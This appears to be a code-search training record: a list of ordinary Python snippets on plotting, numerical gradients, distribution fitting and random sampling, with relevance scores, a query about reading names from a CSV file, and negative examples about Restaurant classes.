"def plot_f(self, samples=0, plot_limits=None, which_data='all', which_functions='all', resolution=None, full_cov=False):\n if which_functions=='all':\n which_functions = [True]*self.kern.Nparts\n if which_data=='all':\n which_data = slice(None)\n\n if self.X.shape[1] == 1:\n Xnew, xmin, xmax = x_frame1D(self.X, plot_limits=plot_limits)\n if samples == 0:\n m,v = self._raw_predict(Xnew, slices=which_functions)\n gpplot(Xnew,m,m-2*np.sqrt(v),m+2*np.sqrt(v))\n pb.plot(self.X[which_data],self.likelihood.Y[which_data],'kx',mew=1.5)\n else:\n m,v = self._raw_predict(Xnew, slices=which_functions,full_cov=True)\n Ysim = np.random.multivariate_normal(m.flatten(),v,samples)\n gpplot(Xnew,m,m-2*np.sqrt(np.diag(v)[:,None]),m+2*np.sqrt(np.diag(v))[:,None])\n for i in range(samples):\n pb.plot(Xnew,Ysim[i,:],Tango.colorsHex['darkBlue'],linewidth=0.25)\n pb.plot(self.X[which_data],self.likelihood.Y[which_data],'kx',mew=1.5)\n pb.xlim(xmin,xmax)\n ymin,ymax = min(np.append(self.likelihood.Y,m-2*np.sqrt(np.diag(v)[:,None]))), max(np.append(self.likelihood.Y,m+2*np.sqrt(np.diag(v)[:,None])))\n ymin, ymax = ymin - 0.1*(ymax - ymin), ymax + 0.1*(ymax - ymin)\n pb.ylim(ymin,ymax)\n if hasattr(self,'Z'):\n pb.plot(self.Z,self.Z*0+pb.ylim()[0],'r|',mew=1.5,markersize=12)\n\n elif self.X.shape[1] == 2:\n resolution = resolution or 50\n Xnew, xmin, xmax, xx, yy = x_frame2D(self.X, plot_limits,resolution)\n m,v = self._raw_predict(Xnew, slices=which_functions)\n m = m.reshape(resolution,resolution).T\n pb.contour(xx,yy,m,vmin=m.min(),vmax=m.max(),cmap=pb.cm.jet)\n pb.scatter(Xorig[:,0],Xorig[:,1],40,Yorig,linewidth=0,cmap=pb.cm.jet,vmin=m.min(), vmax=m.max())\n pb.xlim(xmin[0],xmax[0])\n pb.ylim(xmin[1],xmax[1])\n else:\n raise NotImplementedError, \"Cannot define a frame with more than two input dimensions\"",
"def gradient(f, *varargs):\n N = len(f.shape) # number of dimensions\n n = len(varargs)\n if n == 0:\n dx = [1.0]*N\n elif n == 1:\n dx = [varargs[0]]*N\n elif n == N:\n dx = list(varargs)\n else:\n raise SyntaxError, \"invalid number of arguments\"\n\n # use central differences on interior and first differences on endpoints\n\n outvals = []\n\n # create slice objects --- initially all are [:, :, ..., :]\n slice1 = [slice(None)]*N\n slice2 = [slice(None)]*N\n slice3 = [slice(None)]*N\n\n otype = f.dtype.char\n if otype not in ['f', 'd', 'F', 'D']:\n otype = 'd'\n\n for axis in range(N):\n # select out appropriate parts for this dimension\n out = zeros(f.shape, f.dtype.char)\n slice1[axis] = slice(1, -1)\n slice2[axis] = slice(2, None)\n slice3[axis] = slice(None, -2)\n # 1D equivalent -- out[1:-1] = (f[2:] - f[:-2])/2.0\n out[slice1] = (f[slice2] - f[slice3])/2.0\n slice1[axis] = 0\n slice2[axis] = 1\n slice3[axis] = 0\n # 1D equivalent -- out[0] = (f[1] - f[0])\n out[slice1] = (f[slice2] - f[slice3])\n slice1[axis] = -1\n slice2[axis] = -1\n slice3[axis] = -2\n # 1D equivalent -- out[-1] = (f[-1] - f[-2])\n out[slice1] = (f[slice2] - f[slice3])\n\n # divide by step size\n outvals.append(out / dx[axis])\n\n # reset the slice object in this dimension to \":\"\n slice1[axis] = slice(None)\n slice2[axis] = slice(None)\n slice3[axis] = slice(None)\n\n if N == 1:\n return outvals[0]\n else:\n return outvals",
"def _get_distribution(self, dimension, samples, **kwargs):\n\n # Save settings for distribution\n sample = samples[dimension]\n if 'name' in kwargs:\n name = kwargs.get('name')\n else:\n err_msg = \"_get_distribution misses the argument 'name'.\"\n raise TypeError(err_msg)\n dependency = kwargs.get('dependency', (None, None, None))\n functions = kwargs.get('functions', ('polynomial', 'polynomial', 'polynomial'))\n list_number_of_intervals = kwargs.get('list_number_of_intervals')\n list_width_of_intervals = kwargs.get('list_width_of_intervals')\n\n # Fit inspection data for current dimension\n fit_inspection_data = FitInspectionData()\n\n # Initialize used_number_of_intervals (shape, loc, scale\n used_number_of_intervals = [None, None, None]\n\n # Handle KernelDensity separated\n if name == 'KernelDensity':\n if dependency != (None, None, None):\n raise NotImplementedError(\"KernelDensity can not be conditional.\")\n return KernelDensityDistribution(Fit._fit_distribution(sample, name)), dependency, \\\n used_number_of_intervals, fit_inspection_data\n\n # Initialize params (shape, loc, scale)\n params = [None, None, None]\n\n for index in range(len(dependency)):\n\n # Continue if params is yet computed\n if params[index] is not None:\n continue\n\n # In case that there is no dependency for this param\n if dependency[index] is None:\n current_params = Fit._fit_distribution(sample, name)\n\n # Basic fit for no dependency\n basic_fit = BasicFit(*current_params, sample)\n for i in range(index, len(functions)):\n # Check if the other parameters have also no dependency\n if dependency[i] is None:\n\n # Add basic fit to fit inspection data\n if i == 0:\n fit_inspection_data.append_basic_fit(SHAPE_STRING,\n basic_fit)\n elif i == 1:\n fit_inspection_data.append_basic_fit(LOCATION_STRING,\n basic_fit)\n elif i == 2:\n fit_inspection_data.append_basic_fit(SCALE_STRING,\n basic_fit)\n\n if i == 2 and name == LOGNORMAL_MU_PARAMETER_KEYWORD:\n params[i] = ConstantParam(np.log(current_params[i](0)))\n else:\n params[i] = current_params[i]\n # In case that there is a dependency\n else:\n # If the number of intervals is given.\n if list_number_of_intervals[dependency[index]]:\n interval_centers, dist_values, param_values, multiple_basic_fit = \\\n Fit._get_fitting_values(\n sample, samples, name, dependency, index,\n number_of_intervals=list_number_of_intervals[dependency[index]])\n # If a the (constant) width of the intervals is given.\n elif list_width_of_intervals[dependency[index]]:\n interval_centers, dist_values, param_values, multiple_basic_fit = \\\n Fit._get_fitting_values(\n sample, samples, name, dependency, index,\n bin_width=list_width_of_intervals[dependency[index]])\n\n for i in range(index, len(functions)):\n # Check if the other parameters have the same dependency\n if dependency[i] is not None and dependency[i] == dependency[index]:\n # Add basic fits to fit inspection data\n for basic_fit in multiple_basic_fit:\n if i == 0:\n fit_inspection_data.append_basic_fit(\n SHAPE_STRING,\n basic_fit)\n elif i == 1:\n fit_inspection_data.append_basic_fit(\n LOCATION_STRING,\n basic_fit)\n elif i == 2:\n fit_inspection_data.append_basic_fit(\n SCALE_STRING,\n basic_fit)\n\n # Add interval centers to fit inspection data\n if i == 0:\n fit_inspection_data.shape_at = interval_centers\n elif i == 1:\n fit_inspection_data.loc_at = interval_centers\n elif i == 2:\n fit_inspection_data.scale_at = interval_centers\n\n # Add used number of intervals for current parameter\n used_number_of_intervals[i] = len(interval_centers)\n\n if i == 2 and name == LOGNORMAL_MU_PARAMETER_KEYWORD:\n fit_points = [np.log(p(None)) for p in param_values[i]]\n else:\n fit_points = [p(None) for p in param_values[i]]\n # Fit parameters with particular function\n try:\n param_popt, param_pcov = curve_fit(\n Fit._get_function(functions[i]),\n interval_centers, fit_points, bounds=_bounds)\n except RuntimeError:\n # Case that optimal parameters not found\n if i == 0 and name == LOGNORMAL_MU_PARAMETER_KEYWORD:\n param_name = \"sigma\"\n elif i == 2 and name == LOGNORMAL_MU_PARAMETER_KEYWORD:\n param_name = \"mu\"\n elif i == 0:\n param_name = SHAPE_STRING\n elif i == 1:\n param_name = LOCATION_STRING\n elif i == 2:\n param_name = SCALE_STRING\n\n warnings.warn(\n \"Optimal Parameters not found for parameter '{}' in dimension \"\n \"'{}'. Maybe switch the given function for a better fit. Trying \"\n \"again with a higher number of calls to function '{}'.\".format(\n param_name, dimension, functions[i]),\n RuntimeWarning, stacklevel=2)\n try:\n param_popt, param_pcov = curve_fit(\n Fit._get_function(functions[i]), interval_centers, fit_points,\n bounds=_bounds, maxfev=int(1e6))\n except RuntimeError:\n raise RuntimeError(\n \"Can't fit curve for parameter '{}' in dimension '{}'. \"\n \"Number of iterations exceeded.\".format(param_name, dimension))\n\n # Save parameter\n params[i] = FunctionParam(*param_popt, functions[i])\n\n # Return particular distribution\n distribution = None\n if name == WEIBULL_2P_KEYWORD or name == WEIBULL_3P_KEYWORD or \\\n name == WEIBULL_3P_KEYWORD_ALTERNATIVE:\n distribution = WeibullDistribution(*params)\n elif name == LOGNORMAL_MU_PARAMETER_KEYWORD:\n distribution = LognormalDistribution(sigma=params[0], mu=params[2])\n elif name == LOGNORMAL_EXPMU_PARAMETER_KEYWORD:\n distribution = LognormalDistribution(*params)\n elif name == NORMAL_KEYWORD:\n distribution = NormalDistribution(*params)\n return distribution, dependency, used_number_of_intervals, fit_inspection_data",
"def corr_vars( start=1, stop=10, step=1, mu=0, sigma=3, func=lambda x: x ):\n \n # Generate x\n x = np.arange(start, stop, step) \n \n # Generate random noise\n e = np.random.normal(mu, sigma, x.size)\n \n # Generate y values as y = func(x) + e\n y = np.zeros(x.size)\n \n for ind in range(x.size):\n y[ind] = func(x[ind]) + e[ind]\n \n return (x,y)",
"def generate_data(n, data, labels, param, label):\n\n\tmu = param[0]\n\tsigma = param[1]\n\n\tfor i in range(n):\n\n\t\t# TODO: Recall the notation of x in the exercise sheet.\n\t\t# \t\tGenerate a 2-d Gaussian distributed data point plus an offset value for the bias.\n\t\t# \t\tUse our rand_gaussian method.\n\n\t\tx1 = rand_gaussian(mu[0], sigma[0]) \n\t\tx2 = rand_gaussian(mu[1], sigma[1]) \n\n\t\tdata_point = [1, x1, x2]\n\t\tdata.append(data_point)\n\t\tlabels.append(label)\n\n\treturn data,labels",
"def sampling(args):\r\n z_mean, z_log_var = args\r\n # K is the keras backend\r\n batch = K.shape(z_mean)[0]\r\n dim = K.int_shape(z_mean)[1]\r\n # by default, random_normal has mean=0 and std=1.0\r\n epsilon = K.random_normal(shape=(batch, dim))\r\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampling(args):\r\n z_mean, z_log_var = args\r\n # K is the keras backend\r\n batch = K.shape(z_mean)[0]\r\n dim = K.int_shape(z_mean)[1]\r\n # by default, random_normal has mean=0 and std=1.0\r\n epsilon = K.random_normal(shape=(batch, dim))\r\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampleFunction2(x2: int, y2: float) -> float:\n return x2 * y2",
"def make_data(n_features, n_pts, noise=0.0):\n X = stats.uniform(-1, 2).rvs((n_pts, n_features))\n\n # include a feature of 1's, for first-order terms in quadratic\n ones = np.ones((n_pts, 1))\n X_plus_ones = np.concatenate([ones, X], axis=1)\n\n # random coefficient matrix\n coeffs = stats.uniform(-1, 2).rvs((n_features+1, n_features+1))\n\n y = (X_plus_ones.reshape(n_pts, n_features+1, 1) *\n coeffs *\n X_plus_ones.reshape(n_pts, 1, n_features+1)).sum(axis=(1, 2))\n y += stats.norm(0, noise).rvs(n_pts)\n return X, y",
"def brute(f, ranges, args=(), Ns=3, full_output=False):\n # Generate the parameter space\n lrange = list(ranges)\n N = len(ranges)\n for k in range(N):\n low, high = lrange[k]\n lrange[k] = np.linspace(low, high, Ns)\n xs = np.array(np.meshgrid(*lrange)).T.reshape(-1, N)\n return find_fmin_on_grid(f, xs, args, full_output)",
"def statfunc(f):\n\n def wrapped_f(pymc3_obj, *args, **kwargs):\n try:\n vars = kwargs.pop('vars', pymc3_obj.varnames)\n chains = kwargs.pop('chains', pymc3_obj.chains)\n except AttributeError:\n # If fails, assume that raw data was passed.\n return f(pymc3_obj, *args, **kwargs)\n\n burn = kwargs.pop('burn', 0)\n thin = kwargs.pop('thin', 1)\n combine = kwargs.pop('combine', False)\n # Remove outer level chain keys if only one chain)\n squeeze = kwargs.pop('squeeze', True)\n\n results = {chain: {} for chain in chains}\n for var in vars:\n samples = pymc3_obj.get_values(var, chains=chains, burn=burn,\n thin=thin, combine=combine,\n squeeze=False)\n for chain, data in zip(chains, samples):\n results[chain][var] = f(np.squeeze(data), *args, **kwargs)\n\n if squeeze and (len(chains) == 1 or combine):\n results = results[chains[0]]\n return results\n\n wrapped_f.__doc__ = f.__doc__\n wrapped_f.__name__ = f.__name__\n\n return wrapped_f",
"def interval_multivariate(inputspikes, outputspikes, samples=1):\n times = []\n krdists = []\n for prv, nxt in zip(outputspikes[:-1], outputspikes[1:]):\n krd = multivariate(inputspikes, prv, nxt, samples)\n times.append(krd[0])\n krdists.append(krd[1])\n return times, krdists",
"def DataSample(*args, **kw):\n return cnexxT.DataSample.make_shared(cnexxT.DataSample(*args, **kw))",
"def plot3d(data, label, feature0, feature1, feature2):\n female = []\n male = []\n for i in range(0, 4000):\n if label[i] == 0:\n female.append([data[i, 0], data[i, 1], data[i, 2]])\n elif label[i] == 1:\n male.append([data[i, 0], data[i, 1], data[i, 2]])\n\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(111, projection='3d')\n plt.rcParams['legend.fontsize'] = 10\n ax.plot([row[feature0] for row in female], [row[feature1] for row in female], [row[feature2] for row in female],\n 'o', markersize=8, color='red',\n alpha=0.5, label='Female')\n ax.plot([row[feature0] for row in male], [row[feature1] for row in male], [row[feature2] for row in male], '+',\n markersize=8, alpha=0.5,\n color='blue', label='Male')\n plt.title('4000 Samples for Female and Male')\n ax.legend(loc='upper right')\n plt.show()",
"def _resample(x: np.ndarray, y: np.ndarray, n_samples: Optional[int]) -> Tuple[np.ndarray, np.ndarray]:\n if n_samples is None:\n n_samples = y.size\n new_x = np.linspace(x[0], x[1], n_samples)\n new_y = interp1d(x, y)(new_x)\n return new_x, new_y",
"def map(self, f_list: List[Callable[[np.ndarray], int]], axis: int = 0, chunksize: int = 1000, selection: np.ndarray = None) -> List[np.ndarray]:\n\t\tif hasattr(f_list, '__call__'):\n\t\t\traise ValueError(\"f_list must be a list of functions, not a function itself\")\n\n\t\tresult = []\n\t\tif axis == 0:\n\t\t\trows_per_chunk = chunksize\n\t\t\tfor i in range(len(f_list)):\n\t\t\t\tresult.append(np.zeros(self.shape[0]))\n\t\t\tix = 0\n\t\t\twhile ix < self.shape[0]:\n\t\t\t\trows_per_chunk = min(self.shape[0] - ix, rows_per_chunk)\n\t\t\t\tif selection is not None:\n\t\t\t\t\tchunk = self[ix:ix + rows_per_chunk, :][:, selection]\n\t\t\t\telse:\n\t\t\t\t\tchunk = self[ix:ix + rows_per_chunk, :]\n\t\t\t\tfor i in range(len(f_list)):\n\t\t\t\t\tresult[i][ix:ix + rows_per_chunk] = np.apply_along_axis(f_list[i], 1, chunk)\n\t\t\t\tix = ix + rows_per_chunk\n\t\telif axis == 1:\n\t\t\tcols_per_chunk = chunksize\n\t\t\tfor i in range(len(f_list)):\n\t\t\t\tresult.append(np.zeros(self.shape[1]))\n\t\t\tix = 0\n\t\t\twhile ix < self.shape[1]:\n\t\t\t\tcols_per_chunk = min(self.shape[1] - ix, cols_per_chunk)\n\t\t\t\tif selection is not None:\n\t\t\t\t\tchunk = self[:, ix:ix + cols_per_chunk][selection, :]\n\t\t\t\telse:\n\t\t\t\t\tchunk = self[:, ix:ix + cols_per_chunk]\n\t\t\t\tfor i in range(len(f_list)):\n\t\t\t\t\tresult[i][ix:ix + cols_per_chunk] = np.apply_along_axis(f_list[i], 0, chunk)\n\t\t\t\tix = ix + cols_per_chunk\n\t\treturn result",
"def sampling(args):\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(-0.5 * z_log_var) * epsilon",
"def evaluate_random_function(f, x, y):\n\n # your code goes here",
"def _get_random_data(\n batch_shape: torch.Size, num_outputs: int, n: int = 10, **tkwargs\n) -> Tuple[Tensor, Tensor]:\n rep_shape = batch_shape + torch.Size([1, 1])\n train_x = torch.linspace(0, 0.95, n, **tkwargs).unsqueeze(-1)\n train_x = train_x + 0.05 * torch.rand(n, 1, **tkwargs).repeat(rep_shape)\n train_y = torch.sin(train_x * (2 * math.pi))\n train_y = train_y + 0.2 * torch.randn(n, num_outputs, **tkwargs).repeat(rep_shape)\n return train_x, train_y",
"def _segmented_apply_func(data, func, fs=1.0, n_segments=1, len_segment=None,\n frequency_resolution=None, overlap=0.5,\n func_params_dict=None):\n # Number of data points in time series\n length_signal = np.shape(data)[1]\n\n # It is assumed that data has shape (n_channels, n_samples). To fetch\n # samples set correct axis\n axis = -1\n\n func_params_dict.update(dict(fs=fs))\n\n # If fs and peak resolution is pq.Quantity, get magnitude\n if isinstance(fs, pq.quantity.Quantity):\n fs = fs.rescale('Hz').magnitude\n\n # Determine length per segment - n_per_seg\n if frequency_resolution is not None:\n if frequency_resolution <= 0:\n raise ValueError(\"frequency_resolution must be positive\")\n if isinstance(frequency_resolution, pq.quantity.Quantity):\n dF = frequency_resolution.rescale('Hz').magnitude\n else:\n dF = frequency_resolution\n n_per_seg = int(fs / dF)\n if n_per_seg > data.shape[axis]:\n raise ValueError(\"frequency_resolution is too high for the given \"\n \"data size\")\n elif len_segment is not None:\n if len_segment <= 0:\n raise ValueError(\"len_seg must be a positive number\")\n elif data.shape[axis] < len_segment:\n raise ValueError(\"len_seg must be shorter than the data length\")\n n_per_seg = len_segment\n else:\n if n_segments <= 0:\n raise ValueError(\"n_segments must be a positive number\")\n elif data.shape[axis] < n_segments:\n raise ValueError(\"n_segments must be smaller than the data length\")\n # when only *n_segments* is given, *n_per_seg* is determined by solving\n # the following equation:\n # n_segments * n_per_seg - (n_segments-1) * overlap * n_per_seg =\n # data.shape[-1]\n # -------------------- =============================== ^^^^^^^^^^^\n # summed segment lengths total overlap data length\n n_per_seg = int(data.shape[axis] /\n (n_segments - overlap * (n_segments - 1)))\n\n n_overlap = int(n_per_seg * overlap)\n n_overlap_step = n_per_seg - n_overlap\n n_segments = int((length_signal - n_overlap) / (n_per_seg - n_overlap))\n\n # Generate frequencies for spectral measure estimate\n if func_params_dict.get('return_onesided'):\n freqs = np.fft.rfftfreq(n_per_seg, d=1/fs)\n elif func_params_dict.get('return_onesided') is None:\n # multitaper_psd uses rfft (i.e. no return_onesided parameter)\n freqs = np.fft.rfftfreq(n_per_seg, d=1/fs)\n else:\n freqs = np.fft.fftfreq(n_per_seg, d=1/fs)\n\n # Zero-pad signal to fit segment length\n remainder = length_signal % n_overlap_step\n\n data = np.pad(data, [(0, 0), (0, remainder)],\n mode='constant', constant_values=0)\n\n # Generate array for storing cross spectra estimates of segments\n seg_estimates = np.zeros((n_segments,\n data.shape[0],\n data.shape[0],\n len(freqs)),\n dtype=np.complex64)\n\n n_overlap_step = n_per_seg - n_overlap\n\n for i in range(n_segments):\n\n _, estimate = func(\n data[:, i * n_overlap_step:i * n_overlap_step + n_per_seg],\n **func_params_dict)\n\n # Workaround for mismatched dimensions\n if estimate.ndim != seg_estimates.ndim - 1: # Multitaper PSD\n seg_estimates[i] = estimate[:, np.newaxis, :]\n else:\n seg_estimates[i] = estimate\n\n avg_estimate = np.mean(seg_estimates, axis=0)\n\n return freqs, avg_estimate",
"def interpolate_2d(x, y, z):\n X = np.linspace(min(x), max(x))\n Y = np.linspace(min(y), max(y))\n X, Y = np.meshgrid(X, Y)\n #f = interpolate.interp2d(x, y, z)\n #Z = f(X[0, :], Y[:, 0])\n f = interpolate.LinearNDInterpolator(zip(x, y), z)\n Z = f(X, Y)\n return X, Y, Z",
"def plot3d(data):\n assert span1 == span2\n span = span1\n # ---------------------- create the figure and axes ---------------------- #\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n # -- discretize the definition space and compute the function's images --- #\n X, Y = discretise_space([defspace1, defspace2], n=span)\n Z = data\n\n # ----------------------- appearance and plotting ------------------------ #\n ax.set_zlim(np.min(Z) - 0.5, np.max(Z) + 0.5)\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n ax.set(xlabel='$W\\_C$', ylabel='$W\\_W$', zlabel=\"Utilité\")#,\n # title='Utilité à {} ticks en fonction de W_W et W_C'.format(ticks))\n\n # Plot the surface.\n surf = ax.plot_surface(X, Y, Z, alpha=0.8, #, cmap='binary'\n linewidth=0, antialiased=False, zorder=1)\n\n plt.show()",
"def generateData(numPoints,x,y):\n\tfor i in range(0,numPoints):\n\t\tif (i % 2 == 0):\n\t\t\tx.append(random.normalvariate(25, 15))\n\t\t\ty.append(random.normalvariate(25, 15))\n\t\t\t \n\t\t\t\n\t\telse:\n\t\t\tx.append(random.normalvariate(75, 15))\n\t\t\ty.append(random.normalvariate(75, 15))",
"def f(x):\n n_particles = x.shape[0]\n j = [f_per_particle(x[i]) for i in range(n_particles)]\n #print(\"f j: \", j)\n return np.array(j)"
] | [
"0.7615295",
"0.70778996",
"0.6081689",
"0.57048494",
"0.56257445",
"0.55822027",
"0.55651504",
"0.55339074",
"0.54328907",
"0.53981596",
"0.5369118",
"0.53515136",
"0.53430045",
"0.5319749",
"0.5275369",
"0.5249938",
"0.52404726",
"0.52143115",
"0.52082497",
"0.51295596",
"0.5065049",
"0.5063601",
"0.5039212",
"0.50357884",
"0.5035016",
"0.5013174",
"0.5011391",
"0.5002498",
"0.49957132",
"0.49888596",
"0.49849415",
"0.4977262",
"0.49757117",
"0.4969503",
"0.4953392",
"0.4947583",
"0.49159727",
"0.491036",
"0.49087727",
"0.49006847",
"0.4889334",
"0.48722792",
"0.48484975",
"0.4842241",
"0.48356074",
"0.48356074",
"0.48356074",
"0.48356074",
"0.48356074",
"0.4832969",
"0.48321158",
"0.4827167",
"0.48143882",
"0.48071453",
"0.47991377",
"0.4797065",
"0.47940162",
"0.4784388",
"0.4783718",
"0.4782624",
"0.47810403",
"0.4780347",
"0.47762704",
"0.4772006",
"0.47717047",
"0.47671124",
"0.4765019",
"0.47625548",
"0.47598806",
"0.4759291",
"0.47570184",
"0.47545025",
"0.47502604",
"0.47494572",
"0.47439006",
"0.4740833",
"0.47402674",
"0.47292152",
"0.47273695",
"0.4724088",
"0.47223192",
"0.47174656",
"0.47174656",
"0.47074744",
"0.47022834",
"0.4701743",
"0.46911317",
"0.4689613",
"0.46889967",
"0.46847937",
"0.46694684",
"0.46650767",
"0.4664187",
"0.46641037",
"0.4662821",
"0.46627906",
"0.46622235",
"0.46621388",
"0.46587133",
"0.46584964"
] | 0.7539873 | 1 |
will have to call | def read_csv(self, filename):
with open(filename, 'r') as f:
read = f.read()
self.names = [x for x in read.split('\n') if x]
return self.names | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __call__(self):\n\t\treturn",
"def use(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def __call__(self) -> None:",
"def process(self):",
"def process(self):",
"def process(self):",
"def call(self):",
"def __call__( self ):\n pass",
"def run(self): \r\n return",
"def __call__(self):\n pass",
"def __call__(self):\n pass",
"def support(self):",
"def post_execute(self):",
"def __call__():",
"def __call__():",
"def __call__():",
"def __call__():",
"def __call__():",
"def handle(self):",
"def init(self):",
"def init(self):",
"def _postprocess(self):",
"def regular(self):",
"def _hook(self):",
"def __call__(self):\n raise NotImplementedError",
"def run(self):\r\n pass",
"def initialize(self):",
"def initialize(self):",
"def initialize(self):",
"def initialize(self):",
"def __call__(self):",
"def __call__(self):",
"def execute(self):",
"def execute(self):",
"def execute(self):",
"def execute(self):",
"def RUN(self):",
"def processing(self):\n pass",
"def _prepare(self):",
"def _prepare(self):",
"def apply(self):",
"def main(self):",
"def run(self):\n\t\t\n\t\tpass",
"def apply(self) -> None:",
"def apply(self) -> None:",
"def pre_execute(self):",
"def __call__(object):",
"def degibber(self):",
"def pick_up(self):",
"def _init(self):",
"def result(self):",
"def result(self):",
"def prepare(self):",
"def perform(self):\n pass",
"def update(self):",
"def update(self):",
"def update(self):",
"def run(self):\n \n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def post_build(self):",
"def afterInit(self):",
"def think(self):\n pass",
"def post_init(self):\n\t\tpass",
"def object(self):",
"def __post_init__(self):\n pass",
"def CL(self):",
"def __call__(self):\r\n raise NotImplementedError('override me')",
"def on(self):",
"def process(self):\n pass",
"def application(self):",
"def method(self):",
"def script(self):",
"def target(self):",
"def cx():",
"def post_processor(self):",
"def __init__ (self) :",
"def DM(self):"
] | [
"0.752373",
"0.7373912",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7240168",
"0.719627",
"0.719627",
"0.719627",
"0.71953917",
"0.7184699",
"0.71057045",
"0.70959705",
"0.70959705",
"0.6973527",
"0.6949504",
"0.6867076",
"0.6867076",
"0.6867076",
"0.6867076",
"0.6867076",
"0.6854172",
"0.67677957",
"0.67677957",
"0.67495805",
"0.6738181",
"0.671467",
"0.6704254",
"0.669808",
"0.6693011",
"0.6693011",
"0.6693011",
"0.6693011",
"0.66917676",
"0.66917676",
"0.66773444",
"0.66773444",
"0.66773444",
"0.66773444",
"0.6663744",
"0.66616553",
"0.66404676",
"0.66404676",
"0.66386956",
"0.65971154",
"0.657434",
"0.6573848",
"0.6573848",
"0.65664244",
"0.65637076",
"0.6554807",
"0.65541834",
"0.651954",
"0.6515558",
"0.6515558",
"0.65098375",
"0.6508802",
"0.6491477",
"0.6491477",
"0.6491477",
"0.6489664",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.6471957",
"0.6449475",
"0.6448369",
"0.64375615",
"0.6426431",
"0.641711",
"0.64097166",
"0.64014983",
"0.6400586",
"0.63993907",
"0.63972145",
"0.63701844",
"0.6366413",
"0.6362485",
"0.63542074",
"0.6353878",
"0.6332886",
"0.63222855"
] | 0.0 | -1 |
takes names from RestaurantNames class | def __init__(self, names):
self.names = names
self.results = [] | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.restaurant_name = restaurant_name.title()\n\t\tself.cuisine_type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.name = restaurant_name\n\t\tself.type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.name = restaurant_name\n self.food = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.name = restaurant_name\n self.type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\r\n\t\tself.restaurant_name = restaurant_name\r\n\t\tself.cuisine_type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type",
"def Collection_search_name(C:list, name:str) -> list:\r\n restaurants = []\r\n for r in C:\r\n for dish in r.menu:\r\n if name in dish.name:\r\n restaurants.append(r)\r\n return restaurants",
"def __init__(self, restaurant_name, cuisine_type):\n super().__init__(restaurant_name, cuisine_type)\n self.flavors = [\"Chocolate\", \"Vanilla\", \"Strawberryes\"]",
"def __init__(self, restaurant_name, cuisine_type):\n super().__init__(restaurant_name, cuisine_type)\n self.flavors = [\"vanilla\", \"chocolate\", \"strawberry\", \"raspberry\",\n \"cream cheese\", \"blueberry\", \"snickers\", \"chocolate chip\"]",
"def names(cls) -> List[str]:",
"def __init__(self, restaurant_name, cuisine_type):\n super().__init__(restaurant_name, cuisine_type)\n self.flavors = ['chocolate', 'peanut', 'strawberry']",
"def names(self) -> List:\n ...",
"def __init__(self,restaurant_name, cuisine_type):\r\n\t\tsuper().__init__(restaurant_name,cuisine_type)\r\n\t\tself.flavors = ['chocolate', 'pistachio','mint','vanilla']",
"def names():\n pass",
"def parse_restaurant_name(text):\n stripped = text.lower()\n\n for name_list in RESTAURANT_NAMES:\n for name in name_list:\n if name.lower() in stripped:\n return name_list[0]\n\n return \"\"",
"def names(self) -> list[str]:",
"def __init__(self, restaurant_name,cuisine_type):\r\n self.restaurant = restaurant_name\r\n self.cuisine = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.name = restaurant_name\n self.type = cuisine_type\n self.number_served = 0",
"def __init__(self, restaurant_name, cuisine_type):\n self.name = restaurant_name\n self.type = cuisine_type\n self.number_served = 0",
"def names(filter=None):",
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.restaurant_name = restaurant_name\n\t\tself.cuisine_type = cuisine_type\n\t\tself.number_served = 0",
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.restaurant_name = restaurant_name\n\t\tself.cuisine_type = cuisine_type\n\t\tself.number_served = 0",
"def __init__(self, restaurant_name, cuisine_type, number_served=0):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.number_served = number_served",
"def appending_food_item_names(food_item_names: list) -> None:\n for item in _calories:\n food_item_names.append(item)",
"def describe_restaurant(self):\n print(self.name.title() + \" is known for it's \" + self.cuisine.title() + \".\")",
"def __select_names(self, names):\n random.shuffle(names)\n selected = [names[0]]\n if random.random() > 0.7: # 30% de chances de ter dois nomes\n selected.append(names[1])\n return selected",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.number_served = 0",
